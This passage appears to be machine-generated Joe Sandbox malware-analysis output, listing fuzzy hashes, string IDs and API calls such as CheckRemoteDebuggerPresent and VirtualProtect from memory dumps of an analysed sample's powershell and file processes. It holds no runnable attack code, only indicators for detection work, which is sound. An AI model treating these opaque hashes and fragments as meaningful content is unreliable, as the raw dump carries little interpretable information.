                                                                                          • Opcode Fuzzy Hash: ed6065e81fd42fc84e527eb8cfce3526a5ddaaf063461063ff3e220ee69e14db
                                                                                          • Instruction Fuzzy Hash: D2D0C276B0431727C705941EA4103A777DBDBC5310F188075B904C3201EEA18C124290
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f3b243f707cb27029029402a39ba8440cbaac8b6f933a6992b5e12490d2d46d6
                                                                                          • Instruction ID: 7f5e9fcfdf3f9446c750bab170ad8e584c25ac68f041a0e5c3eb0653c9e4c827
                                                                                          • Opcode Fuzzy Hash: f3b243f707cb27029029402a39ba8440cbaac8b6f933a6992b5e12490d2d46d6
                                                                                          • Instruction Fuzzy Hash: 34E0ED70D041468FCB41EFB9C481569FFF0EF49210B2581EECC59EB215E3715911DB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0079e6b4082bf7fea239bdd6b3fa8975130888f7d3be80567109ffebcfdddce9
                                                                                          • Instruction ID: ea43750cf5bc2ba79f017edcc3f5c45bf7e7934a3aa76fd73b3a3b175cdf645d
                                                                                          • Opcode Fuzzy Hash: 0079e6b4082bf7fea239bdd6b3fa8975130888f7d3be80567109ffebcfdddce9
                                                                                          • Instruction Fuzzy Hash: 23E086713081955BC305677CA8192657FE5EFC666170800BBE909C3381EA299C10C795
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cfd64abe40de8c7d065d2c7ba5f5026f49f3f83505b806d3b42c810228a0be12
                                                                                          • Instruction ID: 8480c4a151ad07eeffa6e8625eafe08c3d2f63e855d035ad86bc13ac8e854a78
                                                                                          • Opcode Fuzzy Hash: cfd64abe40de8c7d065d2c7ba5f5026f49f3f83505b806d3b42c810228a0be12
                                                                                          • Instruction Fuzzy Hash: ACE04674A0820AAFCB04EFB4E4869AABBF5FB04305B004069ED1997780EB305891EBC1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a953bd234e6691bd5e39d0064a068eaface1842ddeeaf3a2a944d391e677f99e
                                                                                          • Instruction ID: fe32b13b4c35b571a46b8e4814397ccf48e4976a4b984b2ac38aad0f38873779
                                                                                          • Opcode Fuzzy Hash: a953bd234e6691bd5e39d0064a068eaface1842ddeeaf3a2a944d391e677f99e
                                                                                          • Instruction Fuzzy Hash: F7E04F3480520E9BCB08AF74E44B4ADBB74FE11301B100599E91252280EF301656CB80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6bd2d14d6a4feadc2624ebb9b72e5d373fdc1bd0bf080bff288595310ebc096
                                                                                          • Instruction ID: 1a2867ce4424e07be74af8e3742f5f7912455c7fc84d502bcf021c48d79f9083
                                                                                          • Opcode Fuzzy Hash: f6bd2d14d6a4feadc2624ebb9b72e5d373fdc1bd0bf080bff288595310ebc096
                                                                                          • Instruction Fuzzy Hash: 38D0C7753001146B8204677DB41A55977E9EBC9E71344007BF61DC3740DE659D0587D5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction ID: e0a36e564d9a97763fdb23cc229022d172719c279afb2332a31627418d87bca4
                                                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction Fuzzy Hash: 7BD06270D042099F8780DFADC94156DFBF4EB48200F6085BE8919D7311E7715A12CBD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 975b815903fb05f409fdfa04a2c983ec8202d659a2abee8e3d242b6466c4a91f
                                                                                          • Instruction ID: 9f3a6cfbf6cd89d0bec5d81cc797ce3d9cdeacfa75b35492f0d54458a39f7b35
                                                                                          • Opcode Fuzzy Hash: 975b815903fb05f409fdfa04a2c983ec8202d659a2abee8e3d242b6466c4a91f
                                                                                          • Instruction Fuzzy Hash: 14D0173080410D8BCB08ABB4E85B4BDBB74FA10301F4001A9D91752290EF351A4ACBC0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6c3ce460fe99450086afa1edec24a89e7ec18ce432453a53e517005e0bee157d
                                                                                          • Instruction ID: 4cab379eb0c342c948198e9255578484fbc48067ee205702f4700baaa1d0ad2f
                                                                                          • Opcode Fuzzy Hash: 6c3ce460fe99450086afa1edec24a89e7ec18ce432453a53e517005e0bee157d
                                                                                          • Instruction Fuzzy Hash: B7D01734A0820E9BCB08EFB4E85687EBBF9BB44300F004169DA59D3380EA305901DBC1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cd3e5026d13ffa831b36585700257452c2e88d19377b71a9d316aa331e34cb5f
                                                                                          • Instruction ID: 6988a2fd5d88d059c395d78b1ab9f6af0450e551516b4e59cbdfbb377b08a3fe
                                                                                          • Opcode Fuzzy Hash: cd3e5026d13ffa831b36585700257452c2e88d19377b71a9d316aa331e34cb5f
                                                                                          • Instruction Fuzzy Hash: 19C04C1751E3D05FEF4347351C761493FB1999352470B89D2D881DB1B7C8588C1ACB62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 659834feb05758bc655d9438cfeae3a62a9bccbc4bde27bf2378cea4efa35b81
                                                                                          • Instruction ID: 4f6c79aceaf95f3a612da2ca646eb4d415dd7cc3369777a9eda1004c39cde8db
                                                                                          • Opcode Fuzzy Hash: 659834feb05758bc655d9438cfeae3a62a9bccbc4bde27bf2378cea4efa35b81
                                                                                          • Instruction Fuzzy Hash: 28C0803414D3849FC7065B7490508A47F149F8121570105DCD4475F9B7C9F3C445CF00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2d0593aab4a59c8bdcc24767e34b164b799c700998848d6911851efb3cdd9ac6
                                                                                          • Instruction ID: 48cdb52c75c408edfa58aaf14856f66d21427c1f9ef0fd83277efc97183bce58
                                                                                          • Opcode Fuzzy Hash: 2d0593aab4a59c8bdcc24767e34b164b799c700998848d6911851efb3cdd9ac6
                                                                                          • Instruction Fuzzy Hash: 63B092301447088FC2496FB9A515814B32DAB8061578004A8E80E1A6A68EB6E894CA84
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq$l$l
                                                                                          • API String ID: 0-1448729859
                                                                                          • Opcode ID: aa4bdf7b6345eba6b96d3419ed06b04bb6dea2629a5909664c5321cdc1af5a8d
                                                                                          • Instruction ID: b08509d8b0823c17f35a4c39fb0997d59dcb19e96c14f5d9d51c01e1e8f81cd8
                                                                                          • Opcode Fuzzy Hash: aa4bdf7b6345eba6b96d3419ed06b04bb6dea2629a5909664c5321cdc1af5a8d
                                                                                          • Instruction Fuzzy Hash: 7AA168B27243569FDB29DB78C801766BFB2AFC6210F1480AAD545EB293DB31CC41C7A1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $ck$4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$$fq$$fq
                                                                                          • API String ID: 0-2178321549
                                                                                          • Opcode ID: 9afa8a2d2e1d6686641f2cba7602bdf0614c06cf01f3357d1007553c8e8366e8
                                                                                          • Instruction ID: 9621b27dba04586feb897f0a049a4cb71edb221795e9acf0028fe46bd6c50c98
                                                                                          • Opcode Fuzzy Hash: 9afa8a2d2e1d6686641f2cba7602bdf0614c06cf01f3357d1007553c8e8366e8
                                                                                          • Instruction Fuzzy Hash: 4DE14CB1B2434ACFCB298B698414667BBF6EFC6210F1580ABD545DF252DB31CC91C7A2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: fkq$`Qfq$`Qfq$tPfq$$fq$$fq$$fq$$fq$$fq
                                                                                          • API String ID: 0-59738900
                                                                                          • Opcode ID: 9d96f5b58dda5060884f680624ad28b649f46c838ccbd9a4e8b27d41d49f1115
                                                                                          • Instruction ID: 37fb6bc12f2715d3dda16988cad0353696fb5e51e5817a639a4a1115bf86d994
                                                                                          • Opcode Fuzzy Hash: 9d96f5b58dda5060884f680624ad28b649f46c838ccbd9a4e8b27d41d49f1115
                                                                                          • Instruction Fuzzy Hash: 86617BB0A3420FDFDB2DCF48C544BAA7BB6AB45351F188095E8159B291C7B1DDE0CBA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ,jq$0omp$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                          • API String ID: 0-3782670052
                                                                                          • Opcode ID: 84c5b1ae950b9ac3abebc4471fa8ba1a03c77158ee5a875974d238360dfb2a36
                                                                                          • Instruction ID: f10ce6c4dc314c98ff3bda576a4a58f1e200ccc3ab98a8fd57c60f17a8b691c6
                                                                                          • Opcode Fuzzy Hash: 84c5b1ae950b9ac3abebc4471fa8ba1a03c77158ee5a875974d238360dfb2a36
                                                                                          • Instruction Fuzzy Hash: 3B41FEA43040158FCB69AB7984995FD3BE6BF88B447241CEAD476CB3B2DEA4CC409752
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$$fq$$fq$$fq$l$l
                                                                                          • API String ID: 0-1664963280
                                                                                          • Opcode ID: 84bd52da3ac69509b393b8f5a19b5a509cc60e24d584bdd698d6109e76b6430f
                                                                                          • Instruction ID: ca400d98bafbc3a3a993cfc5ca73901989794f1fa026934b612037fb5d0d631c
                                                                                          • Opcode Fuzzy Hash: 84bd52da3ac69509b393b8f5a19b5a509cc60e24d584bdd698d6109e76b6430f
                                                                                          • Instruction Fuzzy Hash: 86513CF17242479FDB28DA798800766FBB6BFC2610F24806BD595EB283DB31C841CB91
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: fkq$4'fq$4'fq$4'fq$4'fq
                                                                                          • API String ID: 0-1499809691
                                                                                          • Opcode ID: 4e72bdfc23b1176a0f67f7095aab3b760b48d300b9a3315aaa16fb4fdec0d8de
                                                                                          • Instruction ID: 57bdbe6d030deb4e43e8e88000046568c244f05b73733b4f95ec0a9036fa8fac
                                                                                          • Opcode Fuzzy Hash: 4e72bdfc23b1176a0f67f7095aab3b760b48d300b9a3315aaa16fb4fdec0d8de
                                                                                          • Instruction Fuzzy Hash: E2F12AB1B142568FC7399B78941176ABFA2EFC6210F1480FBD645CB252DB75CC81CBA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: 1e467bb8ec1c71795470527bcd2ceb48718de035c1bcc88487b98e2926e4702f
                                                                                          • Instruction ID: b4ce04a4d27b757a8d726c046dc955cb13f811cc12007e8be8b24002c9678d23
                                                                                          • Opcode Fuzzy Hash: 1e467bb8ec1c71795470527bcd2ceb48718de035c1bcc88487b98e2926e4702f
                                                                                          • Instruction Fuzzy Hash: 3AB1B474E002099FCB55DFA9D990A9DFBF2FF88300F10866AE419AB345DB70A945CF90
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: d84820b74ae50a28d13cad66cd299d4a5ee92263f3b6e3b5fa36a60884185f04
                                                                                          • Instruction ID: d6ae805f325671210b135db2b0a867e30916cd8e8563cfff969c7c11b5df57d5
                                                                                          • Opcode Fuzzy Hash: d84820b74ae50a28d13cad66cd299d4a5ee92263f3b6e3b5fa36a60884185f04
                                                                                          • Instruction Fuzzy Hash: 2EB18374E002099FCB54DFA9D990A9DFBF2FF88300F108669E419AB345EB70A945CF90
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: 9366832e688b135272da63a4dd987bc35a89509dc801651a11693a8ba06ffac5
                                                                                          • Instruction ID: aaa512b82b3ffdcea87e2953ab7833b671c1d0df52c070f17afd63ee3513c270
                                                                                          • Opcode Fuzzy Hash: 9366832e688b135272da63a4dd987bc35a89509dc801651a11693a8ba06ffac5
                                                                                          • Instruction Fuzzy Hash: D5916174E012099FDB54DFA9D590ADDFBF1FB88300F20866AE819AB305DB70A945CF90
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $fq$$fq$$fq$$fq
                                                                                          • API String ID: 0-2113499236
                                                                                          • Opcode ID: 7a56846f6bb8074021b9a4f2553a01b716e3ba7ad688416811a53f11fdc55fbe
                                                                                          • Instruction ID: bd641a9482fc84db5a8b5d3a5a03c345d5c3a518d71971d092c44e5ca149bd2d
                                                                                          • Opcode Fuzzy Hash: 7a56846f6bb8074021b9a4f2553a01b716e3ba7ad688416811a53f11fdc55fbe
                                                                                          • Instruction Fuzzy Hash: C12149B17302179BDB3C597F88017277B9BABD0759F24803AE585CB281EE75C8908361
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$$fq$$fq
                                                                                          • API String ID: 0-2206495126
                                                                                          • Opcode ID: 319764582014bddc7f32974c4603ba1dce3de1f81c696822609ff3af7589003e
                                                                                          • Instruction ID: bed27b66eccee324941e76fbedb357d867ecf06884eaab834bc4c6cc9162476c
                                                                                          • Opcode Fuzzy Hash: 319764582014bddc7f32974c4603ba1dce3de1f81c696822609ff3af7589003e
                                                                                          • Instruction Fuzzy Hash: 6801D66172A3C64FCB3B167818601662FF75F93A5071A40E7C181DF293CE298D8683A7

                                                                                          Execution Graph

                                                                                          Execution Coverage: 9.6%
                                                                                          Dynamic/Decrypted Code Coverage: 100%
                                                                                          Signature Coverage: 0%
                                                                                          Total number of Nodes: 24
                                                                                          Total number of Limit Nodes: 0

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %1K$(K1$9Gxv$9Gxv$=<R3${u(F$C\
                                                                                          • API String ID: 0-857792947
                                                                                          • Opcode ID: f1844cdc62a7036537df677246b577fd3b5d060942a8a3b2cea975a2afcf4b1a
                                                                                          • Instruction ID: 8ead5f2abcc6fd67b7725c38e9105846d5fb5b757b7c32b255b82b80a94e3fee
                                                                                          • Opcode Fuzzy Hash: f1844cdc62a7036537df677246b577fd3b5d060942a8a3b2cea975a2afcf4b1a
                                                                                          • Instruction Fuzzy Hash: 88532C74A01219CFCB54DF64C99569EB7F2EB89305F5081E9D90EA7398DB389E81CF80

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PHfq$`Qfq
                                                                                          • API String ID: 0-814193904
                                                                                          • Opcode ID: 227391c51712fedd71551d28e9fb2ad8d59eb4c914344c7d0df83c9c3c7ef36c
                                                                                          • Instruction ID: a825f4554f955871386fe56fb983e4caa162de006d004b3db1f6df693304b510
                                                                                          • Opcode Fuzzy Hash: 227391c51712fedd71551d28e9fb2ad8d59eb4c914344c7d0df83c9c3c7ef36c
                                                                                          • Instruction Fuzzy Hash: DD514974A44228CFDB24DF64D9947ADB7B2FB45700F508199E50AAB3A0DF345E81AF41

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Dmq
                                                                                          • API String ID: 0-4031372824
                                                                                          • Opcode ID: 9392d29efd45f6283fdb7ffa2eba8624b770d355dae801c89c6cc1740fbcf19f
                                                                                          • Instruction ID: 19269b0107b53d6f98638e76b4f7fe638df551db7264c284b84d6d4e91752333
                                                                                          • Opcode Fuzzy Hash: 9392d29efd45f6283fdb7ffa2eba8624b770d355dae801c89c6cc1740fbcf19f
                                                                                          • Instruction Fuzzy Hash: 2AD15872A041148FCB25EF68D881AAD7BBAFB95220F59C678D802D7355DB31DC05EF82

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 05682E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265678354.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5680000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: e84a66972200fe4b531582efc6a1d90377cb65a218f7a0fbb0c839777b29dd2b
                                                                                          • Instruction ID: 62d211c510419e34cc0efe36091a85aec6202dadb569809739ef689457befb92
                                                                                          • Opcode Fuzzy Hash: e84a66972200fe4b531582efc6a1d90377cb65a218f7a0fbb0c839777b29dd2b
                                                                                          • Instruction Fuzzy Hash: 952125B18002598FCB10DF9AD884BEEBBF4AF48320F14845AE859A7350D778A944CF65

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 05682E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265678354.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5680000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: d6360315f8441e17f764a39f07ea9c8de9ce315b3d0ea51e0a91e0315dfcef0a
                                                                                          • Instruction ID: b6a0e80a975b3ea9f4b6461d72bbc47ac446ec7509b1ee6282cf9246f51cade8
                                                                                          • Opcode Fuzzy Hash: d6360315f8441e17f764a39f07ea9c8de9ce315b3d0ea51e0a91e0315dfcef0a
                                                                                          • Instruction Fuzzy Hash: 7B2116B18002598FCB10DF9AD485BEEBBF4AF48320F14845AE459A7250D778A944CF65

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00D789E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2210877807.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_d70000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: b34dbfc272e271bfd87a19e6dc8462e1e079f96f97b8c8a12e5bd8f0c7f9ac8f
                                                                                          • Instruction ID: b650eeaa255bca39e68d4510258eb133089ce45cbf3b35a420dfad5cb3a7eb83
                                                                                          • Opcode Fuzzy Hash: b34dbfc272e271bfd87a19e6dc8462e1e079f96f97b8c8a12e5bd8f0c7f9ac8f
                                                                                          • Instruction Fuzzy Hash: 421108B1D003099FDB10DFAAC445AAEFBF5FF58320F14841AD519A7250DB759940DFA1

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2210877807.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_d70000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: 7d0885d87877be59858f64a292981c0491edc7c58cc4eb803c630863d8f3d444
                                                                                          • Instruction ID: 1abfe47d9a358d9e095f269339469d05402ddb2fc282f6e055aee630bb349101
                                                                                          • Opcode Fuzzy Hash: 7d0885d87877be59858f64a292981c0491edc7c58cc4eb803c630863d8f3d444
                                                                                          • Instruction Fuzzy Hash: C71128B19002498FDB20DFAAD44579EFBF5AF88324F24841AD519A7240CB75A940CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9c77ee7a605e380380e265b7d8786be4b0cf05c24e47fea5aea6c131a01417d0
                                                                                          • Instruction ID: 86367f5cc67ab4efcf3bcf9f5d453f9df17e55a2cdf50cac88431361bcd0c099
                                                                                          • Opcode Fuzzy Hash: 9c77ee7a605e380380e265b7d8786be4b0cf05c24e47fea5aea6c131a01417d0
                                                                                          • Instruction Fuzzy Hash: 8C512D747001548FDB14FB65E498A6E37E6EB89706F50C928EA06973C8DF389C41AF91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b8ee6d331087c33532ac0f0d3ce977cf04c32fb0d88f93468e5a731466775be4
                                                                                          • Instruction ID: 777977133c62f3a43de84b4419b1800b1eb665ed4578cdad5af4d089240313e3
                                                                                          • Opcode Fuzzy Hash: b8ee6d331087c33532ac0f0d3ce977cf04c32fb0d88f93468e5a731466775be4
                                                                                          • Instruction Fuzzy Hash: FB313670600205CFCB09FB66E1586AE37B6EBCA319F50D429E6029B389DF385D029FD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
